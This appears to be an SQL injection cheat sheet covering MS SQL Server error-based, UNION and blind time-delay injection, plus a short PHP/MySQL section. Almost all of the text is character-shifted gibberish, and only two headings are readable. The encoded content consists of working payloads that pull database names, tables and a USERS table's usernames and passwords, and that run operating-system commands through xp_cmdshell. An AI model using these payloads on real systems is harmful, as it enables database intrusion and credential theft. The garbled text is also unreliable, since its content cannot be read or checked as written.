GSSO<RHSD>O@FD@RO HC NQHM RDKDBSSNOM@LDEQNLRXRNAIDBSRVGDQD


WSXODBG@Q 
@MC M@LD5"#-&/".&

4XMS@WDQQNQBNMUDQSHMFSGDMU@QBG@QU@KTD<5"#-&/".&>SN@BNKTLMNEC@S@SXOD
HMS

4NLDNSGDQNOSHNMR@QD
GSSO<RHSD>O@FD@RO HC NQBNMUDQS 4&-&$5M@LD'30.L@RSDQRXRNAIDBSR
8)&3&WSXOD6@MCM@LD5"#-&/".&


&330342-*/+&$5*0/&953"$5RS5"#-&$0-6.//".&
GSSO<RHSD>O@FD@RO HC NQHM RDKDBSSNOBNKTLM?M@LDEQNL

%#/".&HMENQL@SHNM?RBGDL@BNKTLMRVGDQDS@AKD?M@LD5"#-&/".&

4XMS@WDQQNQBNMUDQSHMFSGDMU@QBG@QU@KTD<$0-6.//".& >SN@BNKTLMNEC@S@
SXODHMS

&330342-*/+&$5*0/&953"$5MC5"#-&$0-6.//".&

GSSO<RHSD>O@FD@RO HC NQHM RDKDBSSNOBNKTLM?M@LDEQNL


%#/".&HMENQL@SHNM?RBGDL@BNKTLMRVGDQDS@AKD?M@LD5"#-&/".&@MC
BNKTLM?M@LD$0-6.//".&

4XMS@WDQQNQBNMUDQSHMFSGDMU@QBG@QU@KTD<$0-6.//".&>SN@BNKTLMNEC@S@SXOD
HMS

&330342-*/+&$5*0/&953"$5QC5"#-&$0-6.//".&

GSSO<RHSD>O@FD@RO HC NQHM RDKDBSSNOBNKTLM?M@LDEQNL


%#/".&HMENQL@SHNM?RBGDL@BNKTLMRVGDQDS@AKD?M@LD5"#-&/".&@MC
BNKTLM?M@LD$0-6.//".&

4XMS@WDQQNQBNMUDQSHMFSGDMU@QBG@QU@KTD<$0-6.//".& >SN@BNKTLMNEC@S@
SXODHMS

&330342-*/+&$5*0/&953"$5RS'*&-%0'RS308
GSSO<RHSD>O@FD@RO HC NQBNMUDQS HMS RDKDBSSNO$0-6.//".&EQNL
5"#-&/".&


4XMS@WDQQNQBNMUDQSHMFSGDMU@QBG@QU@KTD<'*&-%7"-6&>SN@BNKTLMNEC@S@SXOD
HMS

&330342-*/+&$5*0/&953"$5MC'*&-%0'RS308
GSSO<RHSD>O@FD@RO HC NQBNMUDQS HMS RDKDBSSNO$0-6.//".&EQNL
5"#-&/".&


4XMS@WDQQNQBNMUDQSHMFSGDMU@QBG@QU@KTD<'*&-%7"-6&>SN@BNKTLMNEC@S@SXOD
HMS

&330342-*/+&$5*0/&953"$5MC'*&-%0'RS308

GSSO<RHSD>O@FD@RO HC NQBNMUDQS HMS RDKDBSSNO$0-6.//".&EQNL


5"#-&/".&


4XMS@WDQQNQBNMUDQSHMFSGDMU@QBG@QU@KTD<'*&-%7"-6&>SN@BNKTLMNEC@S@SXOD
HMS

&330342-*/+&$5*0/&953"$5RS'*&-%0'MC308

GSSO<RHSD>O@FD@RO HC NQBNMUDQS HMS RDKDBSSNO$0-6.//".&EQNL


5"#-&/".&VGDQD$0-6.//".&/05HM '*&-%7"-6&
NQCDQAX$0-6./
/".&CDRB


4XMS@WDQQNQBNMUDQSHMFSGDMU@QBG@QU@KTD<'*&-%7"-6&0'/%308>SN@BNKTLM
NEC@S@SXODHMS

&330342-*/+&$5*0/&953"$5RS'*&-%0'MC308
GSSO<RHSD>O@FD@RO HC NQBNMUDQS HMS RDKDBSSNO$0-6.//".&EQNL
5"#-&/".&VGDQD$0-6.//".&/05HM '*&-%7"-6&
NQCDQAX$0-6./
/".&CDRB


4XMS@WDQQNQBNMUDQSHMFSGDMU@QBG@QU@KTD<'*&-%7"-6&0'3%308>SN@BNKTLM
NEC@S@SXODHMS

.442-6/*0/*MIDBSHNM
6/*0/42-*/+&$5*0/%&5&$5*0/
*MSDFDQ*MIDBSHNM
GSSO<RHSD>O@FD@RO HC6/*0/4&-&$5"--
"KKPTDQHDRHM@M42-RS@SDLDMSBNMS@HMHMF@6/*0/NODQ@SNQLTRSG@UD@MDPT@K
MTLADQNEDWOQDRRHNMRHMSGDHQS@QFDSKHRSR
GSSO<RHSD>O@FD@RO HC6/*0/4&-&$5"-- 
"KKPTDQHDRHM@M42-RS@SDLDMSBNMS@HMHMF@6/*0/NODQ@SNQLTRSG@UD@MDPT@K
MTLADQNEDWOQDRRHNMRHMSGDHQS@QFDSKHRSR
GSSO<RHSD>O@FD@RO HC6/*0/4&-&$5"--  
"KKPTDQHDRHM@M42-RS@SDLDMSBNMS@HMHMF@6/*0/NODQ@SNQLTRSG@UD@MDPT@K
MTLADQNEDWOQDRRHNMRHMSGDHQS@QFDSKHRSR
GSSO<RHSD>O@FD@RO HC6/*0/4&-&$5"--   
/0&3303

6/*0/42-*/+&$5*0/$NKTLM5XOD&MTLDQ@SHNM
GSSO<RHSD>O@FD@RO HCTMHNMRDKDBSRTL BNKTLM?M@LD
EQNLS@AKD?M@LD
-NNJ@SDQQNQLDRR@FDSNCDSDQLHMDHEC@S@HRHMS NQU@QBG@Q

GSSO<RHSD>O@FD@RO HCTMHNMRDKDBSRTL BNKTLM?M@LD


EQNLS@AKD?M@LD
-NNJ@SDQQNQLDRR@FDSNCDSDQLHMDHEC@S@HRHMS NQU@QBG@Q

GSSO<RHSD>O@FD@RO HCTMHNMRDKDBSRTL BNKTLM?M@LD


EQNLS@AKD?M@LD
-NNJ@SDQQNQLDRR@FDSNCDSDQLHMDHEC@S@HRHMS NQU@QBG@Q

6/*0/42-*/+&$5*0/&953"$5%"5"#"4&64&3

GSSO<RHSD>O@FD@RO HC6/*0/4&-&$5"-- 64&3  


<%#64&3>

6/*0/42-*/+&$5*0/&953"$5%"5"#"4&/".&
GSSO<RHSD>O@FD@RO HC6/*0/4&-&$5"-- %#?/".&  
<%#/".&>

6/*0/42-*/+&$5*0/&953"$5%"5"#"4&7&34*0/
GSSO<RHSD>O@FD@RO HC6/*0/4&-&$5"-- !!7&34*0/  
<%#7&34*0/>

6/*0/42-*/+&$5*0/&953"$54&37&3/".&

GSSO<RHSD>O@FD@RO HC6/*0/4&-&$5"-- !!4&37&3/".&  


<4&37&3/".&>

6/*0/42-*/+&$5*0/&953"$5%"5"#"4&5"#-&4
GSSO<RHSD>O@FD@RO HC 6/*0/4&-&$5"-- M@LD  EQNLRXRNAIDBSRVGDQD
WSXODBG@Q 

<5"#-&/".&>

6/*0/42-*/+&$5*0/&953"$55"#-&$0-6.//".&4

GSSO<RHSD>O@FD@RO HC 6/*0/4&-&$5"-- BNKTLM?M@LD  EQNL


%#/".&HMENQL@SHNM?RBGDL@BNKTLMRVGDQDS@AKD?M@LD5"#-&/".&
<$0-6.//".& >

6/*0/42-*/+&$5*0/&953"$5RS'*&-%
GSSO<RHSD>O@FD@RO HC 6/*0/4&-&$5"-- $0-6.//".&  EQNL5"#-&
/".&
<'*&-%7"-6&>

6/*0/42-*/+&$5*0/&953"$5MC'*&-%
GSSO<RHSD>O@FD@RO HC 6/*0/4&-&$5"-- $0-6.//".&  EQNL5"#-&
/".&
<'*&-%7"-6&>

6/*0/42-*/+&$5*0/&953"$5MC'*&-%
GSSO<RHSD>O@FD@RO HC 6/*0/4&-&$5"-- $0-6.//".&  EQNL5"#-&
/".&
<'*&-%7"-6&>

.442-#KHMC*MIDBSHNM
#-*/%42-*/+&$5*0/%&5&$5*0/
*MSDFDQ*MIDBSHNM
GSSO<RHSD>O@FD@RO HC8"*5'03%&-": RDBNMCR

4SQHMF*MIDBSHNM
GSSO<RHSD>O@FD@RO HCW8"*5'03%&-": RDBNMCR

#@RHB6R@FD
GSSO<RHSD>O@FD@RO HCV@HSENQ CDK@X 
4DDHEHSS@JDRRDBNMCRSNQDSTQMSGDO@FD*EHSCNDR SGDMXNTB@M@RJHSPTDRSHNMR

GSSO<RHSD>
O@FD@RO HCHE MNS RTARSQHMF RDKDBS !!UDQRHNM
 
 
V@HSENQ CDK@X 

"RJHSHEGDHRQTMMHMF42-4DQUDQ

GSSO<RHSD>
O@FD@RO HCHE MNS RDKDBS RXRSDL?TRDQ
 R@ V@HSENQ CDK@X 
"RJHSHEHSRQTMMHMF@RR@

GSSO<RHSD>
O@FD@RO HCHE HR?RQUQNKDLDLADQ RXR@CLHM
  V@HSENQ CDK@X 
"RJHSHESGDBTQQDMSTRDQ@LDLADQNESGDRXR@CLHMFQNTO

#-*/%42-*/+&$5*0/&953"$5%"5"#"4&64&3
5NS@K$G@Q@BSDQR
GSSO<RHSD>O@FD@RO HC*' -&/ 64&3

8"*5'03%&-":
GSSO<RHSD>O@FD@RO HC*' -&/ 64&3

8"*5'03%&-":
GSSO<RHSD>O@FD@RO HC*' -&/ 64&3

8"*5'03%&-": 
RDBNMCR

% RS$G@Q@BSDQ

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 64&3


 


8"*5'03
%&-": RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 64&3


 


8"*5'03
%&-":
GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 64&3
 


8"*5'03
%&-":
GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 64&3
 


8"*5'03
%&-": RDBNMCR

#MC$G@Q@BSDQ
GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 64&3
 


8"*5'03
%&-": RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 64&3


 


8"*5'03
%&-": RDBNMCR

0QC$G@Q@BSDQ
GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 64&3
 


8"*5'03
%&-": RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 64&3


 


8"*5'03
%&-":
GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 64&3
 


8"*5'03
%&-": RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 64&3


 


8"*5'03
%&-": RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 64&3


 


8"*5'03
%&-":
GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 64&3
 


8"*5'03
%&-": RDBNMCR

%@S@A@RD6RDQ%#0

#-*/%42-*/+&$5*0/&953"$5%"5"#"4&/".&
GSSO<RHSD>O@FD@RO HC*' -&/ %#?/".&


8"*5'03%&-":
RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF %#?/".&

 



8"*5'03%&-": RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF %#?/".&

 



8"*5'03%&-": RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF %#?/".&

 



8"*5'03%&-": RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF %#?/".&

 



8"*5'03%&-": RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF %#?/".&

 



8"*5'03%&-": RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF %#?/".&

 



8"*5'03%&-": RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF %#?/".&

 



8"*5'03%&-": RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF %#?/".&

 



8"*5'03%&-": RDBNMCR

%@S@A@RD/@LD130%#

#-*/%42-*/+&$5*0/&953"$5RS %"5"#"4&5"#-&

GSSO<RHSD>O@FD@RO HC*' -&/ 4&-&$5501/".&EQNLRXRNAIDBSRVGDQD


WSXOD6

8"*5'03%&-": RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL


RXRNAIDBSRVGDQDWSXODBG@Q 

 


8"*5'03%&-": 
RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL


RXRNAIDBSRVGDQDWSXODBG@Q 

 


8"*5'03%&-": 
RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL


RXRNAIDBSRVGDQDWSXODBG@Q 

 


8"*5'03%&-": 
RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL


RXRNAIDBSRVGDQDWSXODBG@Q 

 


8"*5'03%&-": 
RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL


RXRNAIDBSRVGDQDWSXODBG@Q 

 


8"*5'03%&-": 
RDBNMCR

5@AKD/@LD64&34

#-*/%42-*/+&$5*0/&953"$5MC%"5"#"4&5"#-&
GSSO<RHSD>O@FD@RO HC*' -&/ 4&-&$5501/".&EQNLRXRNAIDBSRVGDQD
WSXODBG@Q 
@MCM@LD64&34

8"*5'03%&-": RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL


RXRNAIDBSRVGDQDWSXODBG@Q 
@MCM@LD64&34
 


8"*5'03%&-":
 RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL


RXRNAIDBSRVGDQDWSXODBG@Q 
@MCM@LD64&34
 


8"*5'03%&-":
 RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL


RXRNAIDBSRVGDQDWSXODBG@Q 
@MCM@LD64&34
 


8"*5'03%&-":
 RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL


RXRNAIDBSRVGDQDWSXODBG@Q 
@MCM@LD64&34
 


8"*5'03%&-":
 RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL


RXRNAIDBSRVGDQDWSXODBG@Q 
@MCM@LD64&34
 


8"*5'03%&-":
 RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL


RXRNAIDBSRVGDQDWSXODBG@Q 
@MCM@LD64&34
 


8"*5'03%&-":
 RDBNMCR

5@AKD/@LD03%&34

#-*/%42-*/+&$5*0/&953"$5QC%"5"#"4&5"#-&
GSSO<RHSD>O@FD@RO HC*' -&/ 4&-&$5501/".&EQNLRXRNAIDBSRVGDQD
WSXODBG@Q 
@MCM@LD03%&34

8"*5'03%&-": RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL


RXRNAIDBSRVGDQDWSXODBG@Q 
@MCM@LD03%&34
 


8"*5'03%&-":
 RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL


RXRNAIDBSRVGDQDWSXODBG@Q 
@MCM@LD03%&34
 


8"*5'03%&-":
 RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL

RXRNAIDBSRVGDQDWSXODBG@Q 
@MCM@LD03%&34
 


8"*5'03%&-":
 RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL


RXRNAIDBSRVGDQDWSXODBG@Q 
@MCM@LD03%&34
 


8"*5'03%&-":
 RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL


RXRNAIDBSRVGDQDWSXODBG@Q 
@MCM@LD03%&34
 


8"*5'03%&-":
 RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL


RXRNAIDBSRVGDQDWSXODBG@Q 
@MCM@LD03%&34
 


8"*5'03%&-":
 RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL


RXRNAIDBSRVGDQDWSXODBG@Q 
@MCM@LD03%&34
 


8"*5'03%&-":
 RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL


RXRNAIDBSRVGDQDWSXODBG@Q 
@MCM@LD03%&34
 


8"*5'03%&-":
 RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL


RXRNAIDBSRVGDQDWSXODBG@Q 
@MCM@LD03%&34
 


8"*5'03%&-":
 RDBNMCR

5@AKD/@LD$6450.&34

#-*/%42-*/+&$5*0/&953"$5RS5"#-&$0-6.//".&
GSSO<RHSD>O@FD@RO HC*' -&/ 4&-&$5501BNKTLM?M@LDEQNL130
%#HMENQL@SHNM?RBGDL@BNKTLMRVGDQDS@AKD?M@LD64&34

8"*5'03%&-":
 RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501BNKTLM?M@LD


EQNL130%#HMENQL@SHNM?RBGDL@BNKTLMRVGDQDS@AKD?M@LD64&34
 



8"*5'03%&-": RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501BNKTLM?M@LD


EQNL130%#HMENQL@SHNM?RBGDL@BNKTLMRVGDQDS@AKD?M@LD64&34
 



8"*5'03%&-": RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501BNKTLM?M@LD


EQNL130%#HMENQL@SHNM?RBGDL@BNKTLMRVGDQDS@AKD?M@LD64&34
 



8"*5'03%&-": RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501BNKTLM?M@LD


EQNL130%#HMENQL@SHNM?RBGDL@BNKTLMRVGDQDS@AKD?M@LD64&34
 



8"*5'03%&-": RDBNMCR

$NKTLM/@LD64&3

#-*/%42-*/+&$5*0/&953"$5MC5"#-&$0-6.//".&
GSSO<RHSD>O@FD@RO HC*' -&/ 4&-&$5501BNKTLM?M@LDEQNL130
%#HMENQL@SHNM?RBGDL@BNKTLMRVGDQDS@AKD?M@LD64&34@MC
BNKTLM?M@LD64&3

8"*5'03%&-": RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501BNKTLM?M@LD


EQNL130%#HMENQL@SHNM?RBGDL@BNKTLMRVGDQDS@AKD?M@LD64&34@MC
BNKTLM?M@LD64&3
 


8"*5'03%&-": RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501BNKTLM?M@LD


EQNL130%#HMENQL@SHNM?RBGDL@BNKTLMRVGDQDS@AKD?M@LD64&34@MC
BNKTLM?M@LD64&3
 


8"*5'03%&-": RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501BNKTLM?M@LD


EQNL130%#HMENQL@SHNM?RBGDL@BNKTLMRVGDQDS@AKD?M@LD64&34@MC

BNKTLM?M@LD64&3
 


8"*5'03%&-": RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501BNKTLM?M@LD


EQNL130%#HMENQL@SHNM?RBGDL@BNKTLMRVGDQDS@AKD?M@LD64&34@MC
BNKTLM?M@LD64&3
 


8"*5'03%&-": RDBNMCR

$NKTLM/@LD1"44

#-*/%42-*/+&$5*0/&953"$5QC5"#-&$0-6.//".&
GSSO<RHSD>O@FD@RO HC*' -&/ 4&-&$5501BNKTLM?M@LDEQNL130
%#HMENQL@SHNM?RBGDL@BNKTLMRVGDQDS@AKD?M@LD64&34@MC
BNKTLM?M@LD 1"44

8"*5'03%&-": RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501BNKTLM?M@LD


EQNL130%#HMENQL@SHNM?RBGDL@BNKTLMRVGDQDS@AKD?M@LD64&34@MC
BNKTLM?M@LD1"44
 


8"*5'03%&-": RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501BNKTLM?M@LD


EQNL130%#HMENQL@SHNM?RBGDL@BNKTLMRVGDQDS@AKD?M@LD64&34@MC
BNKTLM?M@LD1"44
 


8"*5'03%&-": RDBNMCR

$NKTLM/@LD*%

#-*/%42-*/+&$5*0/&953"$5RS'*&-%0'RS308
GSSO<RHSD>O@FD@RO HC*' -&/ 4&-&$550164&3EQNL64&34

8"*5'03
%&-": RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** RTARSQHMF 4&-&$550164&3EQNL


64&34
 


8"*5'03%&-": RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** RTARSQHMF 4&-&$550164&3EQNL


64&34
 


8"*5'03%&-": RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** RTARSQHMF 4&-&$550164&3EQNL


64&34
 


8"*5'03%&-": RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** RTARSQHMF 4&-&$550164&3EQNL


64&34
 


8"*5'03%&-": RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** RTARSQHMF 4&-&$550164&3EQNL


64&34
 


8"*5'03%&-": RDBNMCR

'HDKC%@S@"%.*/

#-*/%42-*/+&$5*0/&953"$5MC'*&-%0'RS308
GSSO<RHSD>O@FD@RO HC*' -&/ 4&-&$55011"44EQNL64&34

8"*5'03
%&-": RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** RTARSQHMF 4&-&$55011"44EQNL


64&34
 


8"*5'03%&-": RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** RTARSQHMF 4&-&$55011"44EQNL


64&34
 


8"*5'03%&-": RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** RTARSQHMF 4&-&$55011"44EQNL


64&34
 


8"*5'03%&-": RDBNMCR

'HDKC%@S@

#-*/%42-*/+&$5*0/&953"$5MC'*&-%0'RS308
GSSO<RHSD>O@FD@RO HC*' -&/ 4&-&$5501*% EQNL64&34

8"*5'03

%&-": RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** RTARSQHMF 4&-&$5501*% EQNL


64&34
 


8"*5'03%&-": RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** RTARSQHMF 4&-&$5501*% EQNL


64&34
 


8"*5'03%&-": RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** RTARSQHMF 4&-&$5501*% EQNL


64&34
 


8"*5'03%&-": RDBNMCR

'HDKC%@S@

#-*/%42-*/+&$5*0/&953"$5RS'*&-%0'MC308
GSSO<RHSD>O@FD@RO HC*' -&/ 4&-&$550164&3EQNL64&34VGDQD64&3/05
HM "%.*/
NQCDQAX64&34CDRB

8"*5'03%&-": RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$550164&3EQNL


64&34VGDQD64&3/05HM "%.*/
NQCDQAX64&3CDRB
 


8"*5'03%&-":
 RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$550164&3EQNL


64&34VGDQD64&3/05HM "%.*/
NQCDQAX64&3CDRB
 


8"*5'03%&-":
 RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$550164&3EQNL


64&34VGDQD64&3/05HM "%.*/
NQCDQAX64&3CDRB
 


8"*5'03%&-":
 RDBNMCR

'HDKC%@S@+0&

#-*/%42-*/+&$5*0/&953"$5RS'*&-%0'MC308
GSSO<RHSD>O@FD@RO HC*' -&/ 4&-&$550164&3EQNL64&34VGDQD64&3/05
HM +0&
NQCDQAX64&34CDRB

8"*5'03%&-": RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$550164&3EQNL


64&34VGDQD64&3/05HM +0&
NQCDQAX64&3CDRB
 


8"*5'03%&-":
 RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$550164&3EQNL


64&34VGDQD64&3/05HM +0&
NQCDQAX64&3CDRB
 


8"*5'03%&-":
 RDBNMCR

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$550164&3EQNL


64&34VGDQD64&3/05HM +0&
NQCDQAX64&3CDRB
 


8"*5'03%&-":
 RDBNMCR

'HDKC%@S@+*.
Calling the XP_CMDSHELL Stored Procedure in MS SQL Server
(Privileged Database User Account Required)
*MRNLDB@RDRHSHRONRRHAKDSNQTM@QAHSQ@QXBNLL@MCRNM@RXRSDLUH@42-HMIDBSHNM
SGQNTFGSGD91?$.%4)&--RSNQDCOQNBDCTQD )DQD@QDRNLDRSDORSNFDSSGHRVNQJHMF
5DBGMHPTDENQ91?$.%4)&--42-*MIDBSHNMNM8HMCNVR
 $GDBJSGDBTQQDMSC@S@A@RDUDQRHNM 8HSG@MHMA@MC@OOQN@BG DQQNQA@RDC
SGD
RXMS@WENQCNHMFSGHRHM@TRDQM@LDEHDKCNE@KNFHMO@FDVNTKCAD
6RDQM@LD"/% !!7&34*0/
1@RRVNQC@MXSGHMF

0MSGDC@S@A@RDRDQUDQ SGDPTDQXRSQHMFVNTKCKNNJRNLDSGHMFKHJD
4&-&$56RDQRTRDQ 6RDQRO@RRVNQC'30.6RDQR8)&3&6RDQRTRDQab"/%
!!7&34*0/b"/%6RDQRO@RRVNQCa@MXSGHMFb
NTSOTS4XMS@WDQQNQBNMUDQSHMFMU@QBG@QU@KTD.HBQNRNES42-4DQUDQ
*MSDK9

'QNLSGHRNTSOTS VDJMNVSG@SSGD91?$.%4)&--RSNQDCOQNBDCTQDHRKHJDKX@U@HK@AKD
ATSVNTKCQDPTHQDSG@SSGDVDA@OOKHB@SHNMHRTRHMF@OQHUHKDFDC@BBNTMS
 $GDBJVG@STRDQSGDVDA@OOKHB@SHNMHRKNFFDCHMSNSGDC@S@A@RD@R
6RDQM@LD"/%4:45&.?64&3
1@RRVNQC@MXSGHMF
0MSGDC@S@A@RDRDQUDQ SGDPTDQXRSQHMFVNTKCKNNJRNLDSGHMFKHJD
4&-&$56RDQRTRDQ 6RDQRO@RRVNQC'30.6RDQR8)&3&6RDQRTRDQa"/%
4:45&.?64&3b"/%6RDQRO@RRVNQCa@MXSGHMFb
NTSOTS4XMS@WDQQNQBNMUDQSHMFMU@QBG@QU@KTDR@SN@BNKTLMC@S@SXODHMS
'QNLRSDOR@MC VDJMNVENQBDQS@HMSG@SSGDC@S@A@RDHRQTMMHMF.442-4DQUDQ
@RSGDLNRSOQHUHKDFDCTRDQ 5GDQDENQD HSHRKHJDKXSG@SSGD91?$.%4)&--RSNQDC
OQNBDCTQDVHKKADDM@AKDC@MC@U@HK@AKDSNSGDBTQQDMSC@S@A@RDTRDQ
 #DENQD@SSDLOSHMFSNDWDBTSDSGDOQNBDCTQD NMDEHM@KRSDOHRCTDSNRODBHEHB@KKXGNV
VDB@KKDWDB *MSGHRDW@LOKD VD@QDB@KKHMFDWDB@R@MDVPTDQX VGHBGLD@MRSG@SVD
VHKKG@UDSNSDQLHM@SDSGDOQDUHNTRPTDQX 4HMBDVDB@MMNSRDDSGDDW@BSPTDQXRSQHMF@R
@VDATRDQ VDVHKKODQENQL@RHLOKDSDRSSNUDQHEXSG@SSGDC@S@A@RDVHKK@KKNVTRSN
BKNRDNEESGDOQDUHNTRPTDQX@MCQTMSGDMDVNMDVHSGNTS@MXDQQNQ
6RDQM@LD V@HSENQCDK@X
1@RRVNQC@MXSGHMF
 &WDBTSDSGD91?$.%4)&--RSNQDCOQNBDCTQD 4MHEE*$.1SQ@EEHBNMXNTQ@RRDRRLDMS
GNRS 5BOCTLO 8HQDRG@QJ DSB

6RDQM@LDDWDBL@RSDQWO?BLCRGDKKOHMF
1@RRVNQC@MXSGHMF
4&-&$56RDQRTRDQ 6RDQRO@RRVNQC'30.6RDQR8)&3&6RDQRTRDQaDWDB
L@RSDQWO?BLCRGDKKOHMFb"/%6RDQRO@RRVNQCa@MXSGHMFb
*EXNTQDBDHUD*$.1DBGNQDPTDRSSQ@EEHBNQHFHM@SHMFEQNLSGDS@QFDS XNTJMNVSG@SXNT
@QDQTMMHMF@QAHSQ@QXBNLL@MCR@R@M@CLHMHRSQ@SHUDTRDQ 4"
 6MENQSTM@SDKXHMSGD
B@RDR*G@UDENTMCSGHRUTKMDQ@AHKHSXNM NTSOTSV@RMNSRDMSCHQDBSKXSNSGDAQNVRDQ
5G@SHRVGXSGD*$.1SDRSHRCNMD #TSHSHR@KRNONRRHAKDSN@CC@TRDQ DSB

Manual SQL Injection (PHP/MySQL Server)


/TLADQNEBNKTLMRDMTLDQ@SHNM
6RHMF0QCDQAXSNCDSDQLHMDSGDMTLADQNEBNKTLMRHM@FHUDMPTDQXRSQHMFENQTRDVHSG
AKHMCRPKHMIDBSHNM
GSSO<RHSDBNL>O@FDOGO HCNQCDQAX

8GDMVDO@RR HSRGNTKCR@XTMJMNVMBNKTLMHMNQCDQAXBK@TRD8DTRDSGD
OQNBDRRNEDKHLHM@SHNMSNCDSDQLHMDSGDMTLADQNEBNKTLMR/DWSVDVNTKCG@KUDSGD
MTLADQ

GSSO<RHSDBNL>O@FDOGO HCNQCDQAX
"F@HMVDVNTKCFDS@MDQQNQ-DSRSQXRNLDSGHMFKHJD

GSSO<RHSDBNL>O@FDOGO HCNQCDQAX
